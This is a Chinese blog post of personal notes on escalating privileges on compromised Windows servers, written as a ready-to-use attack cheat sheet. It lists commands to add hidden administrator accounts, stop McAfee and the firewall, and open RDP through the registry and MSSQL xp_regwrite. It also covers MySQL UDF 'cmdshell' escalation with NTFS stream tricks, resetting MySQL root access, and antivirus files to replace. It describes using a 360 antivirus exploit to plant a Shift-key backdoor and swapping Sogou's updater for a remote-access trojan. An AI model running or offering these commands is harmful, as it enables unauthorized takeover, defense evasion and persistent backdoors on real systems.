windows提权笔记

好大一条虫 193 次浏览 0

最近遇到了需要提权的居然发现自己不会了。记录一些提权的语句以及思路、记录一些重要的(不定期更新)

0x1 DOS命令

查看版本:ver

查看权限:whoami

查看配置:systeminfo

查看用户:net user

查看进程:tasklist

查看正在运行的服务:tasklist /svc

查看开放的所有端口:netstat -ano

查询管理用户名:query user

查看指定服务的路径:sc qc Mysql

添加用户并提升权限:net user admin daxia.asd /add & net localgroup administrators admin /add

查看指定用户信息:net user admin

查看所有管理权限的用户:net localgroup administrators

加入远程桌面用户组:net localgroup “Remote Desktop Users” admin /add

突破最大连接数:mstsc /admin /v:127.0.0.1

删除用户:net user admin /del

更改系统登陆密码:net password admin

激活GUEST用户:net user guest /active:yes

开启TELNET服务:net start telnet

关闭麦咖啡:net stop “McAfee McShield”

关闭防火墙:net stop sharedaccess

查看当前目录的所有文件:dir c:\windows\

查看制定文件的内容:type c:\windows\1.asp

把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt

开3389端口的命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

菜刀中 (设置CMD终端) setp C:/windows/temp/cmd.txt

0x2 MSSQL

3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。
而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。

开启3389的SQL语句:exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–

关闭3389的SQL语句:exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,1;–

2003可以实现一句话开3389: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f

1433一句话开3389:Exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–

0x3 Mysql

查看Mysql安装的路径 方便我们查找到ROOT密码
select @@basedir as basePath from dual & select @@basedir;
添加用户:select cmdshell('net user 757 757 /add');

添加为管理组:select cmdshell('net localgroup administrators 757 /add');

利用NTFS ADS创建lib目录
select 'It is dll'into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION';

利用NTFS ADS创建plugin目录
select 'It is dll'into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION';

连接到本地的mysql: mysql -uroot -proot

更改远程连接设置: GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION

(如果在mysql中密码查看不了,本地安装mysql)
1.停止mysql服务 替换下载3个文件(user.MYI user.MYD user.frm)
2.切换到bin目录下,进入mysql安全模式,CMD命令:mysqld-nt –skip-grant-tables
3.重新打开一个cmd 切换到bin目录下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot
4.select user,password from mysql.user;

UDF提权
创建相应的函数并执行命令

create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user waitalone waitalone.cn /add');
select cmdshell('net localgroup administrators waitalone /add');
drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell'  删除函数

遇到Can't open shared library的情况、需要我们把udf.dll导出到lib\plugin目录下才可以、不存在plugin目录、利用NTFS ADS流来创建文件夹的方法(看上面)

0x4 常见&重要目录&注册表


serv-u密码:C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

360杀毒db文件替换: c:\Program Files\360\360SD\deepscan\Section\mutex.db c:\Program Files\360\360Safe\deepscan\Section\mutex.db C:\Program Files\360\360Safe\AntiSection\mutex.db

IISrewrite3 文件替换: C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf C:\Program Files\Helicon\ISAPI_Rewrite3\error.log

诺顿杀毒文件替换: c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Persist.Dat

一流过滤相关目录及文件: C:\7i24.com\iissafe\log\startandiischeck.txt C:\7i24.com\iissafe\log\scanlog.htm

其他: Zend文件替换:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 华盾文件替换:C:\WINDOWS\hchiblis.ibl Flash文件替换:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx DU Meter流量统计信息日志文件替换:c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

360提权 找个可读可写目录上传360.exe
cmd命令:/c c:\windows\temp\cookies\360.exe
会提示3段英文: 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 这是成功的征兆,接着连接服务器连按5下shift键,将弹出任务管理器,点击新建任务:explorer.exe 会出现桌面

搜狗提权:搜狗的目录默认是可读可写的,搜狗每隔一段时间就会自动升级,而升级的文件是pinyinup.exe
我们只要把这个文件替换为自己的远控木马,或是添加账户的批处理,等搜狗升级的时候,就可以达成我们的目的了。

发表评论 取消回复
表情 图片 链接 代码